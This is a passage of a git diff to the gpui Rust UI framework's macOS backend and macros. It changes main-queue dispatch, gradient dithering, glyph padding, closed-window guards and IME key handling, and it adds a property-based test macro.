quitting the application asynchronous so that we aren't holding borrows to // the app state on the stack when we actually terminate the app. - use crate::dispatcher::{dispatch_get_main_queue, dispatch_sys::dispatch_async_f}; - unsafe { - dispatch_async_f(dispatch_get_main_queue(), ptr::null_mut(), Some(quit)); + DispatchQueue::main().exec_async_f(ptr::null_mut(), quit); } - unsafe extern "C" fn quit(_: *mut c_void) { + extern "C" fn quit(_: *mut c_void) { unsafe { let app = NSApplication::sharedApplication(nil); let _: () = msg_send![app, terminate: nil]; @@ -1261,19 +1267,13 @@ extern "C" fn on_thermal_state_change(this: &mut Object, _: Sel, _: id) { // Defer to the next run loop iteration to avoid re-entrant borrows of the App RefCell, // as NSNotificationCenter delivers this notification synchronously and it may fire while // the App is already borrowed (same pattern as quit() above). - use crate::dispatcher::{dispatch_get_main_queue, dispatch_sys::dispatch_async_f}; - let platform = unsafe { get_mac_platform(this) }; let platform_ptr = platform as *const MacPlatform as *mut c_void; unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - platform_ptr, - Some(on_thermal_state_change), - ); + DispatchQueue::main().exec_async_f(platform_ptr, on_thermal_state_change); } - unsafe extern "C" fn on_thermal_state_change(context: *mut c_void) { + extern "C" fn on_thermal_state_change(context: *mut c_void) { let platform = unsafe { &*(context as *const MacPlatform) }; let mut lock = platform.0.lock(); if let Some(mut callback) = lock.on_thermal_state_change.take() { @@ -1389,6 +1389,7 @@ unsafe fn ns_url_to_path(url: id) -> Result { #[link(name = "Carbon", kind = "framework")] unsafe extern "C" { pub(super) fn TISCopyCurrentKeyboardLayoutInputSource() -> *mut Object; + pub(super) fn TISCopyCurrentKeyboardInputSource() -> *mut Object; pub(super) fn TISGetInputSourceProperty( inputSource: *mut Object, propertyKey: *const c_void, @@ -1410,6 +1411,9 @@ unsafe extern "C" { pub(super) static kTISPropertyUnicodeKeyLayoutData: CFStringRef; pub(super) static kTISPropertyInputSourceID: CFStringRef; pub(super) static kTISPropertyLocalizedName: CFStringRef; + pub(super) static kTISPropertyInputSourceIsASCIICapable: CFStringRef; + pub(super) static kTISPropertyInputSourceType: CFStringRef; + pub(super) static kTISTypeKeyboardInputMode: CFStringRef; } mod security { diff --git a/crates/gpui_macos/src/shaders.metal b/crates/gpui_macos/src/shaders.metal index 3c6adac3359ac41ee0cc265480dae6e63a2c2136..4dc2d334e1e0929cc2ee7369ecce2f074b919366 100644 --- a/crates/gpui_macos/src/shaders.metal +++ b/crates/gpui_macos/src/shaders.metal @@ -1215,6 +1215,20 @@ float4 fill_color(Background background, break; } } + + // Dither to reduce banding in gradients (especially dark/alpha). + // Triangular-distributed noise breaks up 8-bit quantization steps. + // ±2/255 for RGB (enough for dark-on-dark compositing), + // ±3/255 for alpha (needs more because alpha × dark color = tiny steps). + { + float2 seed = position * 0.6180339887; // golden ratio spread + float r1 = fract(sin(dot(seed, float2(12.9898, 78.233))) * 43758.5453); + float r2 = fract(sin(dot(seed, float2(39.3460, 11.135))) * 24634.6345); + float tri = r1 + r2 - 1.0; // triangular PDF, range [-1, +1] + color.rgb += tri * 2.0 / 255.0; + color.a += tri * 3.0 / 255.0; + } + break; } case 2: { diff --git a/crates/gpui_macos/src/text_system.rs b/crates/gpui_macos/src/text_system.rs index 2511bcf12dc240bf11d2c050579a6c06ebb155ed..d4ffd2514e3ed1a7616cce9bb44cea0b06ab56f3 100644 --- a/crates/gpui_macos/src/text_system.rs +++ b/crates/gpui_macos/src/text_system.rs @@ -53,7 +53,8 @@ use crate::open_type::apply_features_and_fallbacks; #[allow(non_upper_case_globals)] const kCGImageAlphaOnly: u32 = 7; -pub(crate) struct MacTextSystem(RwLock); +/// macOS text system using CoreText for font shaping. +pub struct MacTextSystem(RwLock); #[derive(Clone, PartialEq, Eq, Hash)] struct FontKey { @@ -73,7 +74,8 @@ struct MacTextSystemState { } impl MacTextSystem { - pub(crate) fn new() -> Self { + /// Create a new MacTextSystem. + pub fn new() -> Self { Self(RwLock::new(MacTextSystemState { memory_source: MemSource::empty(), system_source: SystemSource::new(), @@ -359,13 +361,22 @@ impl MacTextSystemState { fn raster_bounds(&self, params: &RenderGlyphParams) -> Result> { let font = &self.fonts[params.font_id.0]; let scale = Transform2F::from_scale(params.scale_factor); - Ok(bounds_from_rect_i(font.raster_bounds( + let mut bounds: Bounds = bounds_from_rect_i(font.raster_bounds( params.glyph_id.0, params.font_size.into(), scale, HintingOptions::None, font_kit::canvas::RasterizationOptions::GrayscaleAa, - )?)) + )?); + + // Add 3% of font size as padding, clamped between 1 and 5 pixels + // to avoid clipping of anti-aliased edges. + let pad = + ((params.font_size.as_f32() * 0.03 * params.scale_factor).ceil() as i32).clamp(1, 5); + bounds.origin.x -= DevicePixels(pad); + bounds.size.width += DevicePixels(pad); + + Ok(bounds) } fn rasterize_glyph( diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index 87cd5ee21d5e448ee43b604657ddbe89e705035b..8811a4159a0f539d2bae2c62242a3d5f490686ef 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -1,7 +1,8 @@ use crate::{ - BoolExt, DisplayLink, MacDisplay, NSRange, NSStringExt, dispatch_get_main_queue, - dispatcher::dispatch_sys::dispatch_async_f, events::platform_input_from_native, ns_string, - renderer, + BoolExt, DisplayLink, MacDisplay, NSRange, NSStringExt, TISCopyCurrentKeyboardInputSource, + TISGetInputSourceProperty, events::platform_input_from_native, + kTISPropertyInputSourceIsASCIICapable, kTISPropertyInputSourceType, kTISTypeKeyboardInputMode, + ns_string, renderer, }; #[cfg(any(test, feature = "test-support"))] use anyhow::Result; @@ -22,6 +23,7 @@ use cocoa::{ NSUserDefaults, }, }; +use dispatch2::DispatchQueue; use gpui::{ AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, ExternalPaths, FileDropEvent, ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, @@ -34,6 +36,9 @@ use gpui::{ #[cfg(any(test, feature = "test-support"))] use image::RgbaImage; +use core_foundation::base::{CFRelease, CFTypeRef}; +use core_foundation_sys::base::CFEqual; +use core_foundation_sys::number::{CFBooleanGetValue, CFBooleanRef}; use core_graphics::display::{CGDirectDisplayID, CGPoint, CGRect}; use ctor::ctor; use futures::channel::oneshot; @@ -44,6 +49,7 @@ use objc::{ runtime::{BOOL, Class, NO, Object, Protocol, Sel, YES}, sel, sel_impl, }; +use objc2_app_kit::NSBeep; use parking_lot::Mutex; use raw_window_handle as rwh; use smallvec::SmallVec; @@ -55,7 +61,10 @@ use std::{ path::PathBuf, ptr::{self, NonNull}, rc::Rc, - sync::{Arc, Weak}, + sync::{ + Arc, Weak, + atomic::{AtomicBool, Ordering}, + }, time::Duration, }; use util::ResultExt; @@ -172,10 +181,22 @@ unsafe fn build_classes() { sel!(mouseExited:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(magnifyWithEvent:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); decl.add_method( sel!(mouseDragged:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(rightMouseDragged:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); + decl.add_method( + sel!(otherMouseDragged:), + handle_view_event as extern "C" fn(&Object, Sel, id), + ); decl.add_method( sel!(scrollWheel:), handle_view_event as extern "C" fn(&Object, Sel, id), @@ -436,6 +457,7 @@ struct MacWindowState { select_previous_tab_callback: Option>, toggle_tab_bar_callback: Option>, activated_least_once: bool, + closed: Arc, // The parent window if this window is a sheet (Dialog kind) sheet_parent: Option, } @@ -760,6 +782,7 @@ impl MacWindow { select_previous_tab_callback: None, toggle_tab_bar_callback: None, activated_least_once: false, + closed: Arc::new(AtomicBool::new(false)), sheet_parent: None, }))); @@ -1016,6 +1039,17 @@ impl Drop for MacWindow { } } +/// Calls `f` if the window is not closed. +/// +/// This should be used when spawning foreground tasks interacting with the +/// window, as some messages will end hard faulting if dispatched to no longer +/// valid window handles. +fn if_window_not_closed(closed: Arc, f: impl FnOnce()) { + if !closed.load(Ordering::Acquire) { + f(); + } +} + impl PlatformWindow for MacWindow { fn bounds(&self) -> Bounds { self.0.as_ref().lock().bounds() @@ -1036,48 +1070,47 @@ impl PlatformWindow for MacWindow { fn resize(&mut self, size: Size) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || unsafe { window.setContentSize_(NSSize { width: size.width.as_f32() as f64, height: size.height.as_f32() as f64, }); - } + }) }) .detach(); } fn merge_all_windows(&self) { let native_window = self.0.lock().native_window; - unsafe extern "C" fn merge_windows_async(context: *mut std::ffi::c_void) { - let native_window = context as id; - let _: () = msg_send![native_window, mergeAllWindows:nil]; + extern "C" fn merge_windows_async(context: *mut std::ffi::c_void) { + unsafe { + let native_window = context as id; + let _: () = msg_send![native_window, mergeAllWindows:nil]; + } } unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - native_window as *mut std::ffi::c_void, - Some(merge_windows_async), - ); + DispatchQueue::main() + .exec_async_f(native_window as *mut std::ffi::c_void, merge_windows_async); } } fn move_tab_to_new_window(&self) { let native_window = self.0.lock().native_window; - unsafe extern "C" fn move_tab_async(context: *mut std::ffi::c_void) { - let native_window = context as id; - let _: () = msg_send![native_window, moveTabToNewWindow:nil]; - let _: () = msg_send![native_window, makeKeyAndOrderFront: nil]; + extern "C" fn move_tab_async(context: *mut std::ffi::c_void) { + unsafe { + let native_window = context as id; + let _: () = msg_send![native_window, moveTabToNewWindow:nil]; + let _: () = msg_send![native_window, makeKeyAndOrderFront: nil]; + } } unsafe { - dispatch_async_f( - dispatch_get_main_queue(), - native_window as *mut std::ffi::c_void, - Some(move_tab_async), - ); + DispatchQueue::main() + .exec_async_f(native_window as *mut std::ffi::c_void, move_tab_async); } } @@ -1258,15 +1291,21 @@ impl PlatformWindow for MacWindow { } }); let block = block.copy(); - let native_window = self.0.lock().native_window; - let executor = self.0.lock().foreground_executor.clone(); + let lock = self.0.lock(); + let native_window = lock.native_window; + let closed = lock.closed.clone(); + let executor = lock.foreground_executor.clone(); executor .spawn(async move { - let _: () = msg_send![ - alert, - beginSheetModalForWindow: native_window - completionHandler: block - ]; + if !closed.load(Ordering::Acquire) { + let _: () = msg_send![ + alert, + beginSheetModalForWindow: native_window + completionHandler: block + ]; + } else { + let _: () = msg_send![alert, release]; + } }) .detach(); @@ -1275,12 +1314,16 @@ impl PlatformWindow for MacWindow { } fn activate(&self) { - let window = self.0.lock().native_window; - let executor = self.0.lock().foreground_executor.clone(); + let lock = self.0.lock(); + let window = lock.native_window; + let closed = lock.closed.clone(); + let executor = lock.foreground_executor.clone(); executor .spawn(async move { - unsafe { - let _: () = msg_send![window, makeKeyAndOrderFront: nil]; + if !closed.load(Ordering::Acquire) { + unsafe { + let _: () = msg_send![window, makeKeyAndOrderFront: nil]; + } } }) .detach(); @@ -1418,11 +1461,12 @@ impl PlatformWindow for MacWindow { fn zoom(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || unsafe { window.zoom_(nil); - } + }) }) .detach(); } @@ -1430,11 +1474,12 @@ impl PlatformWindow for MacWindow { fn toggle_fullscreen(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { + if_window_not_closed(closed, || unsafe { window.toggleFullScreen_(nil); - } + }) }) .detach(); } @@ -1575,45 +1620,48 @@ impl PlatformWindow for MacWindow { fn titlebar_double_click(&self) { let this = self.0.lock(); let window = this.native_window; + let closed = this.closed.clone(); this.foreground_executor .spawn(async move { - unsafe { - let defaults: id = NSUserDefaults::standardUserDefaults(); - let domain = ns_string("NSGlobalDomain"); - let key = ns_string("AppleActionOnDoubleClick"); - - let dict: id = msg_send![defaults, persistentDomainForName: domain]; - let action: id = if !dict.is_null() { - msg_send![dict, objectForKey: key] - } else { - nil - }; + if_window_not_closed(closed, || { + unsafe { + let defaults: id = NSUserDefaults::standardUserDefaults(); + let domain = ns_string("NSGlobalDomain"); + let key = ns_string("AppleActionOnDoubleClick"); + + let dict: id = msg_send![defaults, persistentDomainForName: domain]; + let action: id = if !dict.is_null() { + msg_send![dict, objectForKey: key] + } else { + nil + }; - let action_str = if !action.is_null() { - CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy() - } else { - "".into() - }; + let action_str = if !action.is_null() { + CStr::from_ptr(NSString::UTF8String(action)).to_string_lossy() + } else { + "".into() + }; - match action_str.as_ref() { - "None" => { - // "Do Nothing" selected, so do no action - } - "Minimize" => { - window.miniaturize_(nil); - } - "Maximize" => { - window.zoom_(nil); - } - "Fill" => { - // There is no documented API for "Fill" action, so we'll just zoom the window - window.zoom_(nil); - } - _ => { - window.zoom_(nil); + match action_str.as_ref() { + "None" => { + // "Do Nothing" selected, so do no action + } + "Minimize" => { + window.miniaturize_(nil); + } + "Maximize" => { + window.zoom_(nil); + } + "Fill" => { + // There is no documented API for "Fill" action, so we'll just zoom the window + window.zoom_(nil); + } + _ => { + window.zoom_(nil); + } } } - } + }) }) .detach(); } @@ -1629,6 +1677,10 @@ impl PlatformWindow for MacWindow { } } + fn play_system_bell(&self) { + unsafe { NSBeep() } + } + #[cfg(any(test, feature = "test-support"))] fn render_to_image(&self, scene: &gpui::Scene) -> Result { let mut this = self.0.lock(); @@ -1649,12 +1701,7 @@ impl rwh::HasWindowHandle for MacWindow { impl rwh::HasDisplayHandle for MacWindow { fn display_handle(&self) -> Result, rwh::HandleError> { - // SAFETY: This is a no-op on macOS - unsafe { - Ok(rwh::DisplayHandle::borrow_raw( - rwh::AppKitDisplayHandle::new().into(), - )) - } + Ok(rwh::DisplayHandle::appkit()) } } @@ -1748,6 +1795,45 @@ extern "C" fn handle_key_up(this: &Object, _: Sel, native_event: id) { // - in vim mode `option-4` should go to end of line (same as $) // Japanese (Romaji) layout: // - type `a i left down up enter enter` should create an unmarked text "愛" +// - In vim mode with `jj` bound to `vim::NormalBefore` in insert mode, typing 'j i' with +// Japanese IME should produce "じ" (ji), not "jい" + +/// Returns true if the current keyboard input source is a composition-based IME +/// (e.g. Japanese Hiragana, Korean, Chinese Pinyin) that produces non-ASCII output. +/// +/// This checks two properties: +/// 1. The source type is `kTISTypeKeyboardInputMode` (an IME input mode, not a plain +/// keyboard layout). This excludes non-ASCII layouts like Armenian and Ukrainian +/// that map keys directly without composition. +/// 2. The source is not ASCII-capable, which excludes modes like Japanese Romaji that +/// produce ASCII characters and should allow multi-stroke keybindings like `jj`. +unsafe fn is_ime_input_source_active() -> bool { + unsafe { + let source = TISCopyCurrentKeyboardInputSource(); + if source.is_null() { + return false; + } + + let source_type = + TISGetInputSourceProperty(source, kTISPropertyInputSourceType as *const c_void); + let is_input_mode = !source_type.is_null() + && CFEqual( + source_type as CFTypeRef, + kTISTypeKeyboardInputMode as CFTypeRef, + ) != 0; + + let is_ascii = TISGetInputSourceProperty( + source, + kTISPropertyInputSourceIsASCIICapable as *const c_void, + ); + let is_ascii_capable = !is_ascii.is_null() && CFBooleanGetValue(is_ascii as CFBooleanRef); + + CFRelease(source as CFTypeRef); + + is_input_mode && !is_ascii_capable + } +} + extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent: bool) -> BOOL { let window_state = unsafe { get_window_state(this) }; let mut lock = window_state.as_ref().lock(); @@ -1797,10 +1883,34 @@ extern "C" fn handle_key_event(this: &Object, native_event: id, key_equivalent: // may need them even if there is no marked text; // however we skip keys with control or the input handler adds control-characters to the buffer. // and keys with function, as the input handler swallows them. + // and keys with platform (Cmd), so that Cmd+key events (e.g. Cmd+`) are not + // consumed by the IME on non-QWERTY / dead-key layouts. + // We also send printable keys to the IME first when an IME input source (e.g. Japanese, + // Korean, Chinese) is active and the input handler accepts text input. This prevents + // multi-stroke keybindings like `jj` from intercepting keys that the IME should compose + // (e.g. typing 'ji' should produce 'じ', not 'jい'). If the IME doesn't handle the key, + // it calls `doCommandBySelector:` which routes it back to keybinding matching. + let is_ime_printable_key = !is_composing + && key_down_event + .keystroke + .key_char + .as_ref() + .is_some_and(|key_char| key_char.chars().all(|c| !c.is_control())) + && !key_down_event.keystroke.modifiers.control + && !key_down_event.keystroke.modifiers.function + && !key_down_event.keystroke.modifiers.platform + && unsafe { is_ime_input_source_active() } + && with_input_handler(this, |input_handler| { + input_handler.query_prefers_ime_for_printable_keys() + }) + .unwrap_or(false); + if is_composing + || is_ime_printable_key || (key_down_event.keystroke.key_char.is_none() && !key_down_event.keystroke.modifiers.control - && !key_down_event.keystroke.modifiers.function) + && !key_down_event.keystroke.modifiers.function + && !key_down_event.keystroke.modifiers.platform) { { let mut lock = window_state.as_ref().lock(); @@ -2065,11 +2175,13 @@ fn update_window_scale_factor(window_state: &Arc>) { let scale_factor = lock.scale_factor(); let size = lock.content_size(); let drawable_size = size.to_device_pixels(scale_factor); - unsafe { - let _: () = msg_send![ - lock.renderer.layer(), - setContentsScale: scale_factor as f64 - ]; + if let Some(layer) = lock.renderer.layer() { + unsafe { + let _: () = msg_send![ + layer, + setContentsScale: scale_factor as f64 + ]; + } } lock.renderer.update_drawable_size(drawable_size); @@ -2106,10 +2218,12 @@ extern "C" fn window_did_change_key_status(this: &Object, selector: Sel, _: id) // in theory, we're not supposed to invoke this method manually but it balances out // the spurious `becomeKeyWindow` event and helps us work around that bug. if selector == sel!(windowDidBecomeKey:) && !is_active { + let native_window = lock.native_window; + drop(lock); unsafe { - let _: () = msg_send![lock.native_window, resignKeyWindow]; - return; + let _: () = msg_send![native_window, resignKeyWindow]; } + return; } let executor = lock.foreground_executor.clone(); @@ -2176,6 +2290,7 @@ extern "C" fn close_window(this: &Object, _: Sel) { let close_callback = { let window_state = get_window_state(this); let mut lock = window_state.as_ref().lock(); + lock.closed.store(true, Ordering::Release); lock.close_callback.take() }; @@ -2252,7 +2367,7 @@ extern "C" fn display_layer(this: &Object, _: Sel, _: id) { } } -unsafe extern "C" fn step(view: *mut c_void) { +extern "C" fn step(view: *mut c_void) { let view = view as id; let window_state = unsafe { get_window_state(&*view) }; let mut lock = window_state.lock(); diff --git a/crates/gpui_macros/Cargo.toml b/crates/gpui_macros/Cargo.toml index 2ee8da52fb7a013cefdd5fe79520a5d18f1e5b3f..513dd61d7b1da83aae2ca4779fb187aece3d7278 100644 --- a/crates/gpui_macros/Cargo.toml +++ b/crates/gpui_macros/Cargo.toml @@ -24,4 +24,4 @@ quote.workspace = true syn.workspace = true [dev-dependencies] -gpui = { workspace = true, features = ["inspector"] } +gpui = { workspace = true, features = ["inspector"] } \ No newline at end of file diff --git a/crates/gpui_macros/src/gpui_macros.rs b/crates/gpui_macros/src/gpui_macros.rs index 0f1365be77ec221d9061f588f84ff6acab3c32ab..e30c85e6edbee8b5307a5139c00a222e9a83bc55 100644 --- a/crates/gpui_macros/src/gpui_macros.rs +++ b/crates/gpui_macros/src/gpui_macros.rs @@ -3,6 +3,7 @@ mod derive_app_context; mod derive_into_element; mod derive_render; mod derive_visual_context; +mod property_test; mod register_action; mod styles; mod test; @@ -188,6 +189,79 @@ pub fn test(args: TokenStream, function: TokenStream) -> TokenStream { test::test(args, function) } +/// A variant of `#[gpui::test]` that supports property-based testing. +/// +/// A property test, much like a standard GPUI randomized test, allows testing +/// claims of the form "for any possible X, Y should hold". For example: +/// ``` +/// #[gpui::property_test] +/// fn test_arithmetic(x: i32, y: i32) { +/// assert!(x == y || x < y || x > y); +/// } +/// ``` +/// Standard GPUI randomized tests provide you with an instance of `StdRng` to +/// generate random data in a controlled manner. Property-based tests have some +/// advantages, however: +/// - Shrinking - the harness also understands a notion of the "complexity" of a +/// particular value. This allows it to find the "simplest possible value that +/// causes the test to fail". +/// - Ergonomics/clarity - the property-testing harness will automatically +/// generate values, removing the need to fill the test body with generation +/// logic. +/// - Failure persistence - if a failing seed is identified, it is stored in a +/// file, which can be checked in, and future runs will check these cases before +/// future cases. +/// +/// Property tests work best when all inputs can be generated up-front and kept +/// in a simple data structure. Sometimes, this isn't possible - for example, if +/// a test needs to make a random decision based on the current state of some +/// structure. In this case, a standard GPUI randomized test may be more +/// suitable. +/// +/// ## Customizing random values +/// +/// This macro is based on the [`#[proptest::property_test]`] macro, but handles +/// some of the same GPUI-specific arguments as `#[gpui::test]`. Specifically, +/// `&{mut,} TestAppContext` and `BackgroundExecutor` work as normal. `StdRng` +/// arguments are **explicitly forbidden**, since they break shrinking, and are +/// a common footgun. +/// +/// All other arguments are forwarded to the underlying proptest macro. +/// +/// Note: much of the following is copied from the proptest docs, specifically the +/// [`#[proptest::property_test]`] macro docs. +/// +/// Random values of type `T` are generated by a `Strategy` object. +/// Some types have a canonical `Strategy` - these types also implement +/// `Arbitrary`. Parameters to a `#[gpui::property_test]`, by default, use a +/// type's `Arbitrary` implementation. If you'd like to provide a custom +/// strategy, you can use `#[strategy = ...]` on the argument: +/// ``` +/// #[gpui::property_test] +/// fn int_test(#[strategy = 1..10] x: i32, #[strategy = "[a-zA-Z0-9]{20}"] s: String) { +/// assert!(s.len() > (x as usize)); +/// } +/// ``` +/// +/// For more information on writing custom `Strategy` and `Arbitrary` +/// implementations, see [the proptest book][book], and the [`Strategy`] trait. +/// +/// ## Scheduler +/// +/// Similar to `#[gpui::test]`, this macro will choose random seeds for the test +/// scheduler. It uses `.no_shrink()` to tell proptest that all seeds are +/// roughly equivalent in terms of "complexity". If `$SEED` is set, it will +/// affect **ONLY** the seed passed to the scheduler. To control other values, +/// use custom `Strategy`s. +/// +/// [`#[proptest::property_test]`]: https://docs.rs/proptest/latest/proptest/attr.property_test.html +/// [book]: https://proptest-rs.github.io/proptest/intro.html +/// [`Strategy`]: https://docs.rs/proptest/latest/proptest/strategy/trait.Strategy.html +#[proc_macro_attribute] +pub fn property_test(args: TokenStream, function: TokenStream) -> TokenStream { + property_test::test(args.into(), function.into()).into() +} + /// When added to a trait, `#[derive_inspector_reflection]` generates a module which provides /// enumeration and lookup by name of all methods that have the shape `fn method(self) -> Self`. /// This is used by the inspector so that it can use the builder methods in `Styled` and diff --git a/crates/gpui_macros/src/property_test.rs b/crates/gpui_macros/src/property_test.rs new file mode 100644 index 0000000000000000000000000000000000000000..6bf60eca1b63a86bce22fbf4ae771230ee34726d --- /dev/null +++ b/crates/gpui_macros/src/property_test.rs @@ -0,0 +1,199 @@ +use proc_macro2::TokenStream; +use quote::{format_ident, quote, quote_spanned}; +use syn::{ + FnArg, Ident, ItemFn, Type, parse2, punctuated::Punctuated, spanned::Spanned, token::Comma, +}; + +pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { + let item_span = item.span(); + let Ok(func) = parse2::(item) else { + return quote_spanned! { item_span => + compile_error!("#[gpui::property_test] must be placed on a function"); + }; + }; + + let test_name = func.sig.ident.clone(); + let inner_fn_name = format_ident!("__{test_name}"); + + let parsed_args = parse_args(func.sig.inputs, &test_name); + + let inner_body = func.block; + let inner_arg_decls = parsed_args.inner_fn_decl_args; + let asyncness = func.sig.asyncness; + + let inner_fn = quote! { + let #inner_fn_name = #asyncness move |#inner_arg_decls| #inner_body; + }; + + let arg_errors = parsed_args.errors; + let proptest_args = parsed_args.proptest_args; + let inner_args = parsed_args.inner_fn_args; + let cx_vars = parsed_args.cx_vars; + let cx_teardowns = parsed_args.cx_teardowns; + + let proptest_args = quote! { + #[strategy = ::gpui::seed_strategy()] __seed: u64, + #proptest_args + }; + + let run_test_body = match &asyncness { + None => quote! { + #cx_vars + #inner_fn_name(#inner_args); + #cx_teardowns + }, + Some(_) => quote! { + let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); + #cx_vars + foreground_executor.block_test(#inner_fn_name(#inner_args)); + #cx_teardowns + }, + }; + + quote! { + #arg_errors + + #[::gpui::proptest::property_test(proptest_path = "::gpui::proptest", #args)] + fn #test_name(#proptest_args) { + #inner_fn + + ::gpui::run_test_once( + __seed, + Box::new(move |dispatcher| { + #run_test_body + }), + ) + } + } +} + +#[derive(Default)] +struct ParsedArgs { + cx_vars: TokenStream, + cx_teardowns: TokenStream, + proptest_args: TokenStream, + errors: TokenStream, + + // exprs passed at the call-site + inner_fn_args: TokenStream, + // args in the declaration + inner_fn_decl_args: TokenStream, +} + +fn parse_args(args: Punctuated, test_name: &Ident) -> ParsedArgs { + let mut parsed = ParsedArgs::default(); + let mut args = args.into_iter().collect(); + + remove_cxs(&mut parsed, &mut args, test_name); + remove_std_rng(&mut parsed, &mut args); + remove_background_executor(&mut parsed, &mut args); + + // all remaining args forwarded to proptest's macro + parsed.proptest_args = quote!( #(#args),* ); + + parsed +} + +fn remove_cxs(parsed: &mut ParsedArgs, args: &mut Vec, test_name: &Ident) { + let mut ix = 0; + args.retain_mut(|arg| { + if !is_test_cx(arg) { + return true; + } + + let cx_varname = format_ident!("cx_{ix}"); + ix += 1; + + parsed.cx_vars.extend(quote!( + let mut #cx_varname = gpui::TestAppContext::build( + dispatcher.clone(), + Some(stringify!(#test_name)), + ); + )); + parsed.cx_teardowns.extend(quote!( + dispatcher.run_until_parked(); + #cx_varname.executor().forbid_parking(); + #cx_varname.quit(); + dispatcher.run_until_parked(); + )); + + parsed.inner_fn_decl_args.extend(quote!(#arg,)); + parsed.inner_fn_args.extend(quote!(&mut #cx_varname,)); + + false + }); +} + +fn remove_std_rng(parsed: &mut ParsedArgs, args: &mut Vec) { + args.retain_mut(|arg| { + if !is_std_rng(arg) { + return true; + } + + parsed.errors.extend(quote_spanned! { arg.span() => + compile_error!("`StdRng` is not allowed in a property test. Consider implementing `Arbitrary`, or implementing a custom `Strategy`. https://altsysrq.github.io/proptest-book/proptest/tutorial/strategy-basics.html"); + }); + + false + }); +} + +fn remove_background_executor(parsed: &mut ParsedArgs, args: &mut Vec) { + args.retain_mut(|arg| { + if !is_background_executor(arg) { + return true; + } + + parsed.inner_fn_decl_args.extend(quote!(#arg,)); + parsed + .inner_fn_args + .extend(quote!(gpui::BackgroundExecutor::new(std::sync::Arc::new( + dispatcher.clone() + )),)); + + false + }); +} + +// Matches `&TestAppContext` or `&foo::bar::baz::TestAppContext` +fn is_test_cx(arg: &FnArg) -> bool { + let FnArg::Typed(arg) = arg else { + return false; + }; + + let Type::Reference(ty) = &*arg.ty else { + return false; + }; + + let Type::Path(ty) = &*ty.elem else { + return false; + }; + + ty.path + .segments + .last() + .is_some_and(|seg| seg.ident == "TestAppContext") +} + +fn is_std_rng(arg: &FnArg) -> bool { + is_path_with_last_segment(arg, "StdRng") +} + +fn is_background_executor(arg: &FnArg) -> bool { + is_path_with_last_segment(arg, "BackgroundExecutor") +} + +fn is_path_with_last_segment(arg: &FnArg, last_segment: &str) -> bool { + let FnArg::Typed(arg) = arg else { + return false; + }; + + let Type::Path(ty) = &*arg.ty else { + return false; + }; + + ty.path + .segments + .last() + .is_some_and(|seg| seg.ident == last_segment) +} diff --git a/crates/gpui_macros/src/test.rs b/crates/gpui_macros/src/test.rs index 490ea07fee696908fad91410aa67ff124cdabe64..087e01740d2ba48392afee0ed7e31cf0779b180d 100644 --- a/crates/gpui_macros/src/test.rs +++ b/crates/gpui_macros/src/test.rs @@ -165,12 +165,13 @@ fn generate_test_function( dispatcher.clone(), Some(stringify!(#outer_fn_name)), ); + let _entity_refcounts = #cx_varname.app.borrow().ref_counts_drop_handle(); )); cx_teardowns.extend(quote!( - dispatcher.run_until_parked(); - #cx_varname.executor().forbid_parking(); - #cx_varname.quit(); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + #cx_varname.update(|cx| { cx.background_executor().forbid_parking(); cx.quit(); }); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); inner_fn_args.extend(quote!(&mut #cx_varname,)); continue; @@ -191,10 +192,17 @@ fn generate_test_function( &[#seeds], #max_retries, &mut |dispatcher, _seed| { - let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); + let exec = std::sync::Arc::new(dispatcher.clone()); #cx_vars - foreground_executor.block_test(#inner_fn_name(#inner_fn_args)); + gpui::ForegroundExecutor::new(exec.clone()).block_test(#inner_fn_name(#inner_fn_args)); + drop(exec); #cx_teardowns + // Ideally we would only drop cancelled tasks, that way we could detect leaks due to task <-> entity + // cycles as cancelled tasks will be dropped properly once the runnable gets run again + // + // async-task does not give us the power to do this just yet though + dispatcher.drain_tasks(); + drop(dispatcher); }, #on_failure_fn_name ); @@ -229,13 +237,15 @@ fn generate_test_function( Some(stringify!(#outer_fn_name)) ); let mut #cx_varname_lock = #cx_varname.app.borrow_mut(); + let _entity_refcounts = #cx_varname_lock.ref_counts_drop_handle(); )); inner_fn_args.extend(quote!(&mut #cx_varname_lock,)); cx_teardowns.extend(quote!( drop(#cx_varname_lock); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); #cx_varname.update(|cx| { cx.background_executor().forbid_parking(); cx.quit(); }); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); continue; } @@ -246,12 +256,13 @@ fn generate_test_function( dispatcher.clone(), Some(stringify!(#outer_fn_name)) ); + let _entity_refcounts = #cx_varname.app.borrow().ref_counts_drop_handle(); )); cx_teardowns.extend(quote!( - dispatcher.run_until_parked(); - #cx_varname.executor().forbid_parking(); - #cx_varname.quit(); - dispatcher.run_until_parked(); + #cx_varname.run_until_parked(); + #cx_varname.update(|cx| { cx.background_executor().forbid_parking(); cx.quit(); }); + #cx_varname.run_until_parked(); + drop(#cx_varname); )); inner_fn_args.extend(quote!(&mut #cx_varname,)); continue; @@ -277,6 +288,12 @@ fn generate_test_function( #cx_vars #inner_fn_name(#inner_fn_args); #cx_teardowns + // Ideally we 